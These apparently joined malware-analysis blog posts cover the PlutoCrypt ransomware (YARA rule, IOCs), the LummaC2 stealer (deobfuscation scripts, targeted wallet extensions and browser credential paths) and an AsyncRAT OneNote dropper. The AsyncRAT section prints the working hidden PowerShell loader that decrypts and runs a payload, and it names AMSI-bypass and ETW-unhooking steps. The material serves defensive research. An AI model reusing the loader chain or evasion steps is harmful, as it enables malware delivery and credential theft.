Once a machine was infected and the ransomnote was crafted and displayed the the victim, a POST request will occur to the TA server (199.192.20[.]58:3001) with the unique UID of the machine and a base64 encoded string that contains the RSA Keys:

This part was modified by the authors of PlutoCrypt because in the original code of CryptoJoker the alert for new victim sends and email rather then a POST request:

Yara Rule

rule Win_CryptoJoker_Variants {
    meta:
        author = "0xToxin"
        description = "PlutoCrypt/CryptoJoker Strings"
    strings:
		$n1 = "CryptoJoker" ascii
		$n2 = "PlutoCrypt" nocase
		$s1 = "CryptJokerWalker90912" ascii wide
		$s2 = "SendEmail" ascii
		$s3 = ".partially." ascii wide
		$s4 = ".fully." ascii wide
		$s5 = "Do not delete this file, else the decryption process will be broken" ascii wide
		$s6 = "And the decryption key is:" ascii wide
		$s7 = "The HWID is:" ascii wide
    condition:
        uint16(0) == 0x5a4d and 1 of ($n*) and all of ($s*)
}

VT Graph

Summary

In this blog post we went over a recent phishing campaign that was targeting the Turkish audience with a variant of the CryptoJoker ransomware. Through the blog we learned about the execution flow that the TA used, by abusing task scheduling and some other execution/evading techniques such as duplicating System32 folder & DLL sideloading.
Hopefully you enjoyed reading through and learned a few new things!

IOCs

Urls:
- http://hostdone.ddns[.]net/x1.xml
- http://hostdone.ddns[.]net/task.xml
- http://hostdone.ddns[.]net/t.pd
- http://hostdone.ddns[.]net/u.dl
- http://hostdone.ddns[.]net/pl.exe
- http://hostdone.ddns[.]net/e
Files:
- vakifbank iot-10-04-2023logs.rar - 9026c67b52f9ddece9a7e203978e8aa9ffa5a128cf83a238c924dce141899aec
- vakifbank iot-10-04-2023logs.hta - b05328077aa1dd5dba4d8e25cb028dc4f533bd1dd69bc6d12ec2f8298598f803
- task.xml - 6cbed31fdf5554ead21de9ccdd12ccc6d9f0b4eaf5f874ce96103ab01f522073
- uxtheme.dll - 8279282e07e2fa82cad4f0cb0b450e77dab930a7db7c9488f663002753d79dde
- x.xml - df38a5d9d7d6c9cfea65eb562317f71bea94a0fc731e1fe9121f9479e56f61fd
- enc.xml - 20cf29f926a18b44f580137ddb65d81bc0ed419412910a7682ee7b95b186ac82
- pl.exe - e8527f309846d18fbf85289283dcde7b19063a50b11263ba0d36663df8fcfd30
Domains:
- hostdone.ddns[.]net
- deni[.]tk
IPs:
- 199.192.20[.]58

References

LummaC2 - Stealer Features BreakDown

2023-04-09T00:00:00+00:00

Intro

This blog will be a bit different from my ususal blogs, it will mainly contain scripts and some research I’ve spent on finding some of the things you’ll read through the blog. I’ve tried to cover things that weren’t covered in previous blogs that can be found on Lumma Stealer Malpedia entry

The Phish

The phishing email pretends to be from Walmart and targets sellers on the Walmart Marketplace.

The email claims that the recipient needs to confirm their contact and related information in order to continue selling on the platform.
The email instructs the recipient to download a file called “Walmart Brand Portal.rar” to update their information and suggests disabling antivirus protection if the download doesn’t work.
Clearly it’s not a mail sent from Walmart and the archive will contain a malicious executable in it.

Dynamic Triage Procedure

In many cases when I’m analyzing malwares I want to reach to the final payload rather than dealing with the inital loader binary.
Every analyst has it’s own tricks of how would he find and dump the actual piece of malware that he wants to analyze; And I will share what is my favourite tool when I want to get my hands quickly on the final payload.

PE-Sieve

PE-Sieve is a great tool created by hasherezade which:
“Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).”

Dump Lumma Binary

So in order to dump the Lumma binary I will execute the executable which is stored inside of the archive delivered by the phishing email, I will monitor the executable activity in Process hacker and wait for some internal process to be created as part of the injection process. (in this case the injected process will be AddInProcess32.exe)

Step 1 - Execute the payload:

Step 2 - Use PE-Sieve on the Injected Process:

Into The Lumma

Now that we have the dumped payload, I will be going through some of the functionalities and capabilities that the Lumma Stealer has.

Control Flow Flattening

Lumma’s developer added some CFF to the stealer code in order to make some hard time on reversers to find their way through the right execution flow of the malware.
There are a lot of blogs talks about this obfuscation technique and how threat actors and malware developers leverages this technique to slow down malware reversers (you can find several by the end of the blog under the References section)

I’ve used SophosLabs emotet_unflatten_poc plugin in order to try and clean the decompiler code abit , it helped by classifying each section as a Label and now it’s abit more accessible and not requiring to scroll over the function alot:

Strings Obfuscation

I took a brief look at the strings presented in the extracted payload and witnessed that alot of them are obfuscated:

After doing a small research, I found out the Lumma obfuscates the strings by inserting the string 576xed inside of them.
Those strings are being deobfuscated by dedicated function which requires the obfuscated string as an input and afterward it returns the clean string.

I’ve created python script that will get all the xrefs for the strings deobfuscating function, extract the argument being passed to the function and then will deobfuscate it and write the strings to a file:

import idc
import idautils

DECRYPTION_FUNCTION = 0x45DF86 # Change to the relevant function call
STRINGS_FILE_PATH = '' # Output file for the strings
OBFUSCATOR_STRING = '576xed' # Might be changed in future builds

def getArg(ref_addr):
    ref_addr = idc.prev_head(ref_addr)
    if idc.print_insn_mnem(ref_addr) == 'push':
        if idc.get_operand_type(ref_addr, 0) == idc.o_imm:
            return(idc.get_operand_value(ref_addr, 0))
        else:
            return None

stringsList = []

for xref in idautils.XrefsTo(DECRYPTION_FUNCTION):
    argPtr = getArg(xref.frm)
    if not argPtr:
        continue
    data = idc.get_bytes(argPtr, 100)
    obfuscatedData = data.split(b'\x00\x00')[0].replace(b'\x00',b'').decode()
    stringsList.append(obfuscatedData.replace(OBFUSCATOR_STRING,""))

print(f'[+] {len(stringsList)} Strings were extracted')

out = open(STRINGS_FILE_PATH, 'w')
for string in stringsList:
    out.write(f'{string}\n')
out.close()

[+] 135 Strings were extracted

################
# OUTPUT FILE: #
################

\Local Extension Settings\
/Extensions/
*
nkddgncdjgjfcddamfgcmfnlhccnimig
NeoLine
cphhlgmgameodnhkjdmkpanlelnlohao
Clover
nhnkbkgjikgcigadomkphalanndcapjk
Liquality
kpfopkelmapcoipemfendmdcghnegimn
Terra Station
fhmfendgdocmcbmfikdcogofphimnkno
Auro
cnmamaachppnkjgnildpdmkaakejnhae
aeachknmefphepccionboohckonoeemg
Authenticator
bhghoamapcdpbohphigoooaddinpkbai
Cyano
dkdedlpgdmmkkfjabffeganieamfklkm
Byone
Login Data For Account
OneKey
Nifty
jbdaocneiiinmjbjlgalhcelgbejmnid
Math
iWlt
kncchdigobghenbbaddojjnnaogfppfj
EnKrypt
kkpllkodjeloidieedojogacfhpaihoh
Wombat
amkmjjmmflddogmhpjloimipbofnfjih
MEW CX
nlbmnnijcnlegkjjpcfjclmcfggfefdm
Guild
nanjmdknhkinifnkgdcggcfnhdaammmj
Coin98
infeboajgfhgbjpjbeppbkgnabfdkdaf
Leaf
cihmoadaighcejopammfbmddcmdekcje
Authy
ejbalbakoplchlghecdalmeeeajnimhm
nkbihfbeogaeaoehlefnkodbefgpgknn
TronLink
ibnejdfjmmkpcnlpebklmnkoeoihofec
Ronin Wallet
fnjhmkhhmkbjkkabndcnnogagogbneec
Binance Chain Wallet
fhbohimaelbohpjbbldcngcnapndodjp
Yoroi
afbcbjpbpfadlkmhmclhkeeodmamcflc
gaedmjdfmmahhbjefcbgaolhhanlaolb
Saturn
bcopgchhojmggmffilplmbdicgaihlkp
ZilPay
klnaejjgbibmhlephnhpmaofohgkpgkd
Phantom
bfnaelmomeimhlpmgjnjophhpkkoljpa
hcflpincpppdclinealmandijcmnkbgn
Temple
ookjlbkiijinhpmnjffcofjonbfbgaoc
TezBox
mnfifefkajgofkcjkemidiaecocnkjeh
DAppPlay
lodccjjbdhfakaekdiahmedfbieldgik
BitClip
ijmpgkjfkbfhoebgogflfebnmejmfbml
Steem Keychain
History
Jaxx Liberty
cjelfplplebdjjenllpjcblmjkfcffne
BitApp
fihkakfobkmkjojpchpfgcmhfjnmnfpi
Network\Cookies
History
Polymesh
jojhfeoedkpkglbfimdfabpdfjaoolaf
ICONex
flpiciilemghbmfalicajoolhkkenfel
Nabox
ffnbelfdoeiohenkjibnmadjiehjhajb
Web Data
Login Data
aiifbnbfobpmeekipheeijimdpnlpgpp
Keplr
dmkamcknogkgcdfhhbddcghachkejeap
Sollet
nlgbhdfgdhgbiamfdfmbikcdghidoadd
Coinbase
hnfanknocfeofbddgcijnmhnfnkdnaad
Guarda
hpglfhgfnhbgpjdenjgmdgoeiappafln
EQUAL
blnieiiffboillknjnepogjhkgnoapac
lkcjlnjfpbikmcmbachjpdbijejflpcm
Nash Extension
onofpnbbkehpmmoabgpcpmigafmmnjhl
Hycon Lite Client
Trezor Password Manager
imloifkgjagghnncjkhggdhalmcnfklk
EOS Authenticator
oeljdldpnmdbchonielidgobddffflal
GAuth Authenticator
ilgcnhelpchnceeipipijaljkblbcobl
nknhiehlklippafakaeklbeglecifhad
KHC
\Local State
*.txt
%userprofile%
Wallets/Ethereum
keystore
%appdata%\Ethereum
%localappdata%\Kometa\User
Chromium
%localappdata%\Chromium\User Data
Edge
%localappdata%\Microsoft\Edge\Us
%appdata%\Opera Software\Op576xe
Chrome
%localappdata%\Google\Chro
Mozilla Firefox
Wallets/Binance
app-store.json
%appdata%\Binance
Kometa
Important Files/Profile
Opera GX Stable
%appdata%\Opera Software\Op576xe
Opera Neon
Opera Stable
%appdata%\Opera Software\Op576xe
Wallets/Electrum
*
%appdata%\Electrum\wallets
%appdata%\Mozilla\Firefox\Prof57
System.txt

Chrome Extensions (CRX)

Looking at the strings there is a lot of extensions names that Lumma targets, but the thing that I was curious about were the 32 length lower case strings (for example: ilgcnhelpchnceeipipijaljkblbcobl) those strings are actually CRX IDs (Chrome Extension ID) which by navigating to C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions and looking for the CRX ID the stealer will know whether or not the extension exists on the victims computer and if it does it will continue to exfiltrate the extension sensitive data.

I’ve created a python script that will lookup for those unique ID’s in the previously extracted strings file and fetch the name of the extension from google chrome webstore:

import re, requests

LUMMA_STRINGS = '/Users/igal/malwares/Lumma/29.03.2023/LummaStrings.txt'
REGEX_PATTERN = '^[a-z]{32}$'
strings = open(LUMMA_STRINGS,'r').read()
crxExtensionList = re.findall(REGEX_PATTERN,strings,re.MULTILINE)


for crxId in crxExtensionList:
    url = f'https://chrome.google.com/webstore/detail/{crxId}'
    responseText = requests.get(url).text
    try:
        startIndex = responseText.index('itemprop="name" content="') + len('itemprop="name" content="')
        endIndex = responseText.index('"', startIndex)
        extensionName = responseText[startIndex:endIndex]
        print(f'[+] Extension name:{extensionName} , CRX ID:{crxId}')
    except ValueError:
        continue

[+] Extension name:NeoLine , CRX ID:cphhlgmgameodnhkjdmkpanlelnlohao
[+] Extension name:CLV Wallet , CRX ID:nhnkbkgjikgcigadomkphalanndcapjk
[+] Extension name:Liquality Wallet , CRX ID:kpfopkelmapcoipemfendmdcghnegimn
[+] Extension name:Auro Wallet , CRX ID:cnmamaachppnkjgnildpdmkaakejnhae
[+] Extension name:Coin98 Wallet , CRX ID:aeachknmefphepccionboohckonoeemg
[+] Extension name:Authenticator , CRX ID:bhghoamapcdpbohphigoooaddinpkbai
[+] Extension name:Cyano Wallet , CRX ID:dkdedlpgdmmkkfjabffeganieamfklkm
[+] Extension name:iWallet , CRX ID:kncchdigobghenbbaddojjnnaogfppfj
[+] Extension name:Enkrypt: Ethereum, Polkadot & Canto Wallet , CRX ID:kkpllkodjeloidieedojogacfhpaihoh
[+] Extension name:Wombat - Gaming Wallet for Ethereum & EOS , CRX ID:amkmjjmmflddogmhpjloimipbofnfjih
[+] Extension name:MEW CX - is now Enkrypt , CRX ID:nlbmnnijcnlegkjjpcfjclmcfggfefdm
[+] Extension name:LeafWallet - Easy to use EOS wallet , CRX ID:cihmoadaighcejopammfbmddcmdekcje
[+] Extension name:MetaMask , CRX ID:nkbihfbeogaeaoehlefnkodbefgpgknn
[+] Extension name:TronLink , CRX ID:ibnejdfjmmkpcnlpebklmnkoeoihofec
[+] Extension name:Ronin Wallet , CRX ID:fnjhmkhhmkbjkkabndcnnogagogbneec
[+] Extension name:Binance Wallet , CRX ID:fhbohimaelbohpjbbldcngcnapndodjp
[+] Extension name:Math Wallet , CRX ID:afbcbjpbpfadlkmhmclhkeeodmamcflc
[+] Extension name:Authy , CRX ID:gaedmjdfmmahhbjefcbgaolhhanlaolb
[+] Extension name:Hycon Lite Client , CRX ID:bcopgchhojmggmffilplmbdicgaihlkp
[+] Extension name:ZilPay , CRX ID:klnaejjgbibmhlephnhpmaofohgkpgkd
[+] Extension name:Phantom , CRX ID:bfnaelmomeimhlpmgjnjophhpkkoljpa
[+] Extension name:KHC , CRX ID:hcflpincpppdclinealmandijcmnkbgn
[+] Extension name:Temple - Tezos Wallet , CRX ID:ookjlbkiijinhpmnjffcofjonbfbgaoc
[+] Extension name:TezBox - Tezos Wallet , CRX ID:mnfifefkajgofkcjkemidiaecocnkjeh
[+] Extension name:DAppPlay , CRX ID:lodccjjbdhfakaekdiahmedfbieldgik
[+] Extension name:Polymesh Wallet , CRX ID:jojhfeoedkpkglbfimdfabpdfjaoolaf
[+] Extension name:ICONex , CRX ID:flpiciilemghbmfalicajoolhkkenfel
[+] Extension name:Yoroi , CRX ID:ffnbelfdoeiohenkjibnmadjiehjhajb
[+] Extension name:Station Wallet , CRX ID:aiifbnbfobpmeekipheeijimdpnlpgpp
[+] Extension name:Keplr , CRX ID:dmkamcknogkgcdfhhbddcghachkejeap
[+] Extension name:Byone , CRX ID:nlgbhdfgdhgbiamfdfmbikcdghidoadd
[+] Extension name:Coinbase Wallet extension , CRX ID:hnfanknocfeofbddgcijnmhnfnkdnaad
[+] Extension name:Guarda , CRX ID:hpglfhgfnhbgpjdenjgmdgoeiappafln
[+] Extension name:Trezor Password Manager , CRX ID:imloifkgjagghnncjkhggdhalmcnfklk
[+] Extension name:EOS Authenticator , CRX ID:oeljdldpnmdbchonielidgobddffflal
[+] Extension name:GAuth Authenticator , CRX ID:ilgcnhelpchnceeipipijaljkblbcobl
[+] Extension name:Nabox Wallet , CRX ID:nknhiehlklippafakaeklbeglecifhad

Dynamic API Resolve

Lumma hides some of its APIs by hashing then using the MurmurHash2 hashing algorithim , it can be identifed by the const: 0x5bd1e995:

Lumma will pass two arguments to the API resolving function:

The hash of the wanted API
The DLL which contains the API

I have two scripts that I wrote for this part, the first script is IDA script that will get all the xrefs to the API resolving function, extract the hash and the API hash, and will save the output to a text file:

import idc
import idautils

API_FUNCTION = 0x471958 # Change to the relevant function call
APIS_FILE_PATH = '' # Output file for the strings

apiDict = {}

def getDLLRef(hash_addr):
    ref_addr = idc.prev_head(hash_addr)
    if idc.print_insn_mnem(ref_addr) == 'push':
        if idc.get_operand_type(ref_addr, 0) == idc.o_imm:
            dll_addr = idc.get_operand_value(ref_addr, 0)
            return idc.get_bytes(dll_addr, 50).split(b'\x00\x00')[0].replace(b'\x00',b'').decode()
    return None

def getHashDict(ref_addr):
    ref_addr = idc.prev_head(ref_addr)
    if idc.print_insn_mnem(ref_addr) == 'push':
        if idc.get_operand_type(ref_addr, 0) == idc.o_imm:
            hashVal = hex(idc.get_operand_value(ref_addr, 0))
            if hashVal not in apiDict or apiDict[hashVal] == None:
                dllVal = getDLLRef(ref_addr)
                apiDict[hashVal] = dllVal

for xref in idautils.XrefsTo(API_FUNCTION):
    getHashDict(xref.frm)

print(f'[+] {len(apiDict)} API hashes were extracted')

out = open(APIS_FILE_PATH, 'w')
for k, v in apiDict.items():
    out.write(f'{k} - {v}\n')
out.close()

[+] 18 API hashes were extracted

################
# OUTPUT FILE: #
################

0xe8ff1073 - crypt32.dll
0x864087d1 - crypt32.dll
0x7328f505 - kernel32.dll
0xc40f97d4 - advapi32.dll
0x507048c2 - winhttp.dll
0x406457c2 - winhttp.dll
0x7aa0edcc - winhttp.dll
0xb72f0de - winhttp.dll
0x59886bc0 - winhttp.dll
0x76b029a - winhttp.dll
0xf9f57cf0 - winhttp.dll
0xe268a0c1 - winhttp.dll
0xab3372e8 - winhttp.dll
0x5658bf2e - KernelBase.dll
0x23fef64a - advapi32.dll
0x5f086d32 - kernel32.dll
0xa2f80070 - kernel32.dll
0x2f9959e0 - kernel32.dll

The second script will extract the hashes and the DLLs names from the text file, and based on the DLL name it will be loaded using PEfile, and iterate through the DLL exports , hash them using murmurhash2 and compare it to the given hash: (NOTE: The seed in this case was 0x20 but it might be possible changed in future builds)

import pefile
from murmurhash2 import murmurhash2

DLLS_PATH = '/Users/igal/malwares/Lumma/29.03.2023/dlls/' # can be replaced with system32 folder
LUMMA_API_HASHES = '/Users/igal/malwares/Lumma/29.03.2023/LummaApiHashes.txt'

SEED = 0x20 # might be changed in upcoming builds

def hashDllAPI(dllName, apiHash):
    pe = pefile.PE(dllName)
    for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:
        try:
            expName = export.name
            hashValue = murmurhash2(expName, SEED)
            if hex(hashValue) == apiHash:
                return expName.decode()
        except AttributeError:
            continue

apiHashesFile = open(LUMMA_API_HASHES,'r').read()
lines = apiHashesFile.split('\n')


for line in lines:
    args = line.split(' - ')
    dllName = hashDllAPI(f'{DLLS_PATH}{args[1]}', args[0])
    print(f'[+] {args[0]} - {dllName}')

[+] 0xe8ff1073 - CryptStringToBinaryA
[+] 0x864087d1 - CryptUnprotectData
[+] 0x7328f505 - ExpandEnvironmentStringsW
[+] 0xc40f97d4 - GetCurrentHwProfileA
[+] 0x507048c2 - WinHttpOpenRequest
[+] 0x406457c2 - WinHttpConnect
[+] 0x7aa0edcc - WinHttpCloseHandle
[+] 0xb72f0de - WinHttpSendRequest
[+] 0x59886bc0 - WinHttpWriteData
[+] 0x76b029a - WinHttpReceiveResponse
[+] 0xf9f57cf0 - WinHttpOpen
[+] 0xe268a0c1 - WinHttpSetTimeouts
[+] 0xab3372e8 - WinHttpAddRequestHeaders
[+] 0x5658bf2e - IsWow64Process2
[+] 0x23fef64a - GetUserNameA
[+] 0x5f086d32 - GetPhysicallyInstalledSystemMemory
[+] 0xa2f80070 - GetComputerNameA
[+] 0x2f9959e0 - GetSystemDefaultLocaleName

Yara Rule

rule Win_LummaC2 {
    meta:
        author = "0xToxin"
        description = "LummaC2 Strings"
    strings:
		$obfuscatorString = "576xed" ascii wide
		$s1 = "dp.txt" ascii wide
		$s2 = "c2sock" ascii wide
		$s3 = "TeslaBrowser" ascii wide
		$s4 = "Software.txt" ascii wide
    condition:
        uint16(0) == 0x5a4d and all of ($s*) and #obfuscatorString > 10 and filesize < 1500KB
}

Yara Hunt of the rule

Summary

In this blog I went over some techniques used by the Lumma stealer including the hashing algorithim used in the API hashing procedure, the strings obfuscation and some Google Chrome extensions research.
If you want to learn more about how Lumma exfiltrates it data, check the blogs in the references below.

IOCs

URLs:
- https://marketplace.walmart[.]lc/download.php
Files:
- Walmart Brand Portal.rar - d69520637a73226a61c09298295145923fc60a06584528cb1f05a530479a7a36
- Walmart Brand Portal.exe - 9b9388c1b9e9417df5ca4e883ef595455932dfce24ca1dad9897d506aecdac2a
- Lumma Binary - 19fefb958bd9c9280d07754ab903022a3dc9fc380a6964733a1dcc016aba8150
C2:
- 82.117.255[.]80/c2sock
User Agent:
- TeslaBrowser/5.5

References

AsyncRAT OneNote Dropper

2023-02-11T00:00:00+00:00

Intro

We will be covering a recent payload delivery technique leveraging OneNote documents to lure users open fake attachments and become a victim of AsyncRAT malware.

OneNote Analysis

The OneNote document contains inside of itself a hidden .bat file that we can see by hovering the “phishy” button:

We can use OneDump.py in order to see what embedded files the document has and by this understand what we need to extract:

We can see that 2 files has .PNG magic bytes which indicates that these files are images. but the second file actually starts with @ech which indicates a start of a Batch script.

We can dump the file by simply applying the flags -s followed up with the file stream ID and the -d for dump:

Batch Analysis

looking at the batch script on text editor we can see 3 main things:

The script contains broken strings that are assigned to variables.
A huge Base64 blob in the middle of the script.
A call that concatenates the broken strings into a command.

We can use the cmd and copy paste the strings assigns and then output the final commands:

These are the 3 commands that are being executed by the batch script:

1.
copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /y "%~0.exe"

2.
cd "%~dp0"

3.
"%~nx0.exe" -noprofile -windowstyle hidden -ep bypass -command $flLnL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('%~f0').Split([Environment]::NewLine);foreach ($jhglm in $flLnL) { if ($jhglm.StartsWith(':: ')) {  $uDeAm = $jhglm.Substring(3); break; }; };$dLIJD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uDeAm);$nJkwh = New-Object System.Security.Cryptography.AesManaged;$nJkwh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nJkwh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nJkwh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('I5NM1YScgS/1//5R8gmm/tnI3DRCjxBbFnAG0xn8rTc=');$nJkwh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mehcJXqMnXZUmnmrBD1Eeg==');$bIbyd = $nJkwh.CreateDecryptor();$dLIJD = $bIbyd.TransformFinalBlock($dLIJD, 0, $dLIJD.Length);$bIbyd.Dispose();$nJkwh.Dispose();$gJfcg = New-Object System.IO.MemoryStream(, $dLIJD);$dkGYN = New-Object System.IO.MemoryStream;$yfRSU = New-Object System.IO.Compression.GZipStream($gJfcg, [IO.Compression.CompressionMode]::Decompress);$yfRSU.CopyTo($dkGYN);$yfRSU.Dispose();$gJfcg.Dispose();$dkGYN.Dispose();$dLIJD = $dkGYN.ToArray();$qMhaY = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($dLIJD);$haTMg = $qMhaY.EntryPoint;$haTMg.Invoke($null, (, [string[]] ('%*')))

Basically what happens is that the script copies powershell.exe to the current folder and then executes a powershell script with hidden windows and execution policy set to bypass

Powershell Analysis

Looking at the powershell script we can see here also 3 main parts:

Iterate through the content of the batch script line by line and once a line starts with :: remove this matching pattern and stop interating.
AES decryption process.
Invoking the decrypted binary.

The script will retrieve the big blob I’ve mentioned in the batch script analysis part and decrypt it using AES, the key for the decryption will be: I5NM1YScgS/1//5R8gmm/tnI3DRCjxBbFnAG0xn8rTc= (in base64) and the IV will be: mehcJXqMnXZUmnmrBD1Eeg== (also in base64).

The output after the decryption process will be a .gz archive that then being decompressed and the content of it will be a binary that will be invoked by the script.

The CyberChef recipe can be found here

I’ve also implemented a python script that can be used to decrypt and save the .gz archive:

from malduck import aes
from base64 import b64decode

BATCH_FILE_PATH = '/Users/igal/malwares/Asyncrat/OneNote/2. one.bat'
AES_KEY = 'I5NM1YScgS/1//5R8gmm/tnI3DRCjxBbFnAG0xn8rTc='
AES_IV = 'mehcJXqMnXZUmnmrBD1Eeg=='
OUTPUT_ARCHIVE_PATH = '/Users/igal/malwares/Asyncrat/OneNote/4.one.gz'

batchFile = open(BATCH_FILE_PATH, 'r').readlines()
encFile = ''
for line in batchFile:
    if ':: ' in line:
        encFile = line[3:]
        break

key = b64decode(AES_KEY)
iv = b64decode(AES_IV)
data = b64decode(encFile)

plainData = aes.cbc.decrypt(key, iv, data)

open(OUTPUT_ARCHIVE_PATH, 'wb').write(plainData)
print(f'[+] gz archive was created in:{OUTPUT_ARCHIVE_PATH}')

[+] gz archive was created in:/Users/igal/malwares/Asyncrat/OneNote/4.one.gz

.NET Loader

now we can analyze the loader stored in the archive. The loader is 32bit .NET assembly:

I open up the loader in DnSpy in order to further analyze it. The loader has several key actions:

Set the file to be hidden and part of the system files
VM check based on computer system info

AMSI Bypass (similar POC code can be found here

ETW Unhooking which will disable the logging for Assembly.Load calls, this topic is explained in depth by XPN.

Decrypt strings which some of them used during the AMSI Bypass & ETW Unhooking procedures and other strings are part of the loader functionalities. the method that will be in charge of decrypting those strings is DCPmslvtGCDAiOhxxQvq.MvljRQYEXFVoIflOHPxg and it’s actually another AES decryption routine which receives 3 arguments: Cipher, key, iv (after decoding those arguments from base64).

I’ve created a quick PowerShell script that invokes the method with the encrypted strings and prints out the decrypted strings

$reflectedAsm = [System.Reflection.Assembly]::LoadFile(PATH_TO_FILE)

$mainType = $reflectedAsm.GetType("rwcQssqTcyOdXXoBLoie.DCPmslvtGCDAiOhxxQvq")

$key = [System.Convert]::FromBase64String("iUlREPUR7NQ6ocefGLoxBty1eSNembQTSWsROZidb0A=")
$iv = [System.Convert]::FromBase64String("U+YnktYGyx/j43tP2+WVyw==")

$encryptedStrings = ("8qhzRqWw9fiH/7/a5reZMA==", "D/l1SD7OECP0XB2rUm87gA==", "lbk35FoNbOitTifMeNV97Q==", "uJDwrcc4OjLfnn4YCE0Bxw==", "x9nd50/ydQ4NyJMlduaTA1aZE7EpXLNuSa2GwfmjWlxjNEtyTrE+c9z9hlGIXS4Q")

foreach ($encArg in $encryptedStrings){
    $decodedArg = [System.Convert]::FromBase64String($encArg)
    $DecResult = [System.Text.Encoding]::UTF8.GetString(($mainType.GetMethod("MvljRQYEXFVoIflOHPxg")).invoke($null,@($decodedArg, $key, $iv)))
    Write-Output $DecResult
}

The decrypted strings are:

AmsiScanBuffer
EtwEventWrite
payload.exe
runpe.dll
/c choice /c y /n /d y /t 1 & attrib -h -s "

The first two strings are part of the AMSI Bypass and ETW Unhooking procedures. payload.exe and runpe.dll are strings that the loader will try to fetch from the binary resources, if we look at the resources of this binary we can see 2 resources:

payload.exe
Ticket_Reprint.pdf The loader will iterate through the binary resources and if the name of the resource isn’t one of the decrypted strings it will instantly fetch the content of the resource and execute it. In our case the loader will load a fake PDF for the user:

The loader will decrypt the content of payload.exe resource which will be another .gz archive and it will decompress it with the method XWmzUoViPReUSRriqGvB.

For this I’ve also implemented a quick PowerShell script that will invoke those methods to retrieve the final payload

$stream = $reflectedAsm.GetManifestResourceStream("payload.exe")
$binaryReader = New-Object System.IO.BinaryReader($stream)
$contents = $binaryReader.ReadBytes($stream.Length)
$DecryptedGZ = $mainType.GetMethod("MvljRQYEXFVoIflOHPxg").invoke($null,@($contents, $key, $iv))
$finalPayload = $mainType.GetMethod("XWmzUoViPReUSRriqGvB").invoke($null, @(,$DecryptedGZ))

[io.file]::WriteAllBytes(PATH_TO_FILE,$finalPayload)

Now that the loader has his final payload it will invoke the entry point of the payload and will execute a cmd command to delete the file from disk:

ASyncRAT Payload

I will not conduct a deep analysis of the capabilities of ASyncRAT, as it’s a pretty known and heavy analyzed malware, if you want to find out in depth analysis of this family you can find it out here.

What I will be doing is creating a short PowerShell script that will extract the configuration automatically for us:

$reflectedAsm = [System.Reflection.Assembly]::LoadFile("C:\Users\igal\Desktop\AsyncRAT.bin")

$SettingsType = $reflectedAsm.GetType("Client.Settings")

($SettingsType.GetMethod("InitializeSettings")).Invoke($null, $null)

$fields = $SettingsType.GetFields()

foreach ($field in $fields){
    $value = $field.GetValue($null)
    Write-Host "$($field.Name): $value"
}

The output will be:

Ports: 6606,7707,8808
Hosts: 207.244.236.205
Version: 0.5.7B
Install: false
InstallFolder: %AppData%
InstallFile: 
Key: 
�� �i�ph���↕�6→#�ס�B♦�
MTX: AsyncMutex_6SI8OkPnk
Certificate: SD58z6lYrooqCm8bVSOWmKOD2MuNYpniBO2revEinEMuHrAbTKh4Oi9w9RXFKogGADbFfzn8t6wT/IFjL83rZa69Y8HmYud8dQ2cAfYwWEfroB1VDheMwoyEFFzl4M2gbuHbHxtVQH+MP0oz6lRFV8ceuByhbYiUsQwwVWE/O2rCojMDilpp/0jPwSZehMWaFvB6Sf0vurfudia5OATtYKuzrH0Q0Wb0BmvmAgrt5hJ3sI+kJ1tRDaSWjdrYBdqBsBMeMO8EWvuLa7rRkcTV6weDuC5TmWB7in38K5+tUvI8ygHc5JCPSh79WBW6Wavi2Jkb2d7FXEMkQgWrQMAikB9LN+RAOT+JVDBDA9XOq69tVi3ddeUVmFH9mgMfSBHalZKEimTA81rKzHBoiLOKm/58vFDp1kjfWNMqYVT8t42v4G3Dz4IU3Oq2mR92RInBw18utBk/lyRhxlCUh8H9NS+q7MHoojyyHEnZfRl9asZ/YNxLAniB0wapRgJ+AnZapwaDh+1ycmpzZV5YsROtT5uDZnykPQxB6ldWYKEVTw7Wg4tFRSAajwnHvSRj8/zUYd5g9SI4oY5Wo6JAeAQtc/z030wQTZc2fnlVNV5SJz93J7QzyeBTFrX0823ahQzLSdApEI1blw94ZEohBAsmRfLCJofPxKn+OfV088s5J9dEbzxgpVBwoezmR04PoUqPwX92QGKQAfkXg1MhtqVfM1vSFonP69dZvIy+X5kfZLH73LNIubJUWlAJ7UIeKnXGpMB0P7KQX6/4n9Imzw7WAJK1B9KyxqfXM24bN5OAuf6yIwQ1ZMx0SToeME6lfn0A2NQyc3NdK7xitkJY+Or3IeKTfKou4PLtnm0END/53gxHTJxVxQ2BRtIu2kYrv/jixSySUcmJIjeSpZnf+Hwd7vLk7IB7hy5I4Ji6/Gavkhcfm3frZU2ZHPlHuXGKk3aS1lO05tO/HdNZN2vouqZ7tA+4IamVj9hr3kIx1Q0LmeEpl24LGYlOMWOdDLRUhHum3NnzM36n/LcmwKTrfRDxEjKx2feqx0vHUC3GMOxLKYHPHSukF5cqVfd9QOsnjqAHI/0fJHbLq3waABFvcAZp1DRQ68RpSwYpBKCFvmUyBXpJiU7jb8acv/zuTfGPzblfnSpK4HWLDa6Jppc0Xx/omyqSCixpQ+HF5rNHt+EWnRVIPwHF38qLhfg6erGa8v7j/ZmJGRVQWGM6kPmWfKjgRvm4q+UMUqMfwDcKq+/A19fnl9lqMn2bOPW1XZK4/e+ZIUWhZxMw2lZ8KUG0llLYG2oHO8NJJZQCt/gcuoirY1yXz3d6JCSkgbuVike6H5GpiDWuI28Rd+XqXScs1i7nT18DlxE9oGfUtPx2ft9LvDNfmNn0+T6h+ydDRbd4xOFVCTMrI8/xkECvUA0rLD58kbdbifQUgtZGr1USpw3RzwqLxfPkC9zR8yWlij6IUOT9bXave701lCNrNqxWfkjt+fTT5XAMp0bWHlN3O2RU8F579VgIQQlNaKk77XM22UxIP9mcJZBEjsY47H6cwXBNbm0+jjq0Y+tBZwz1WcJpyTH8pGH2g1pW5O6CHMSp/+MEFk36pt8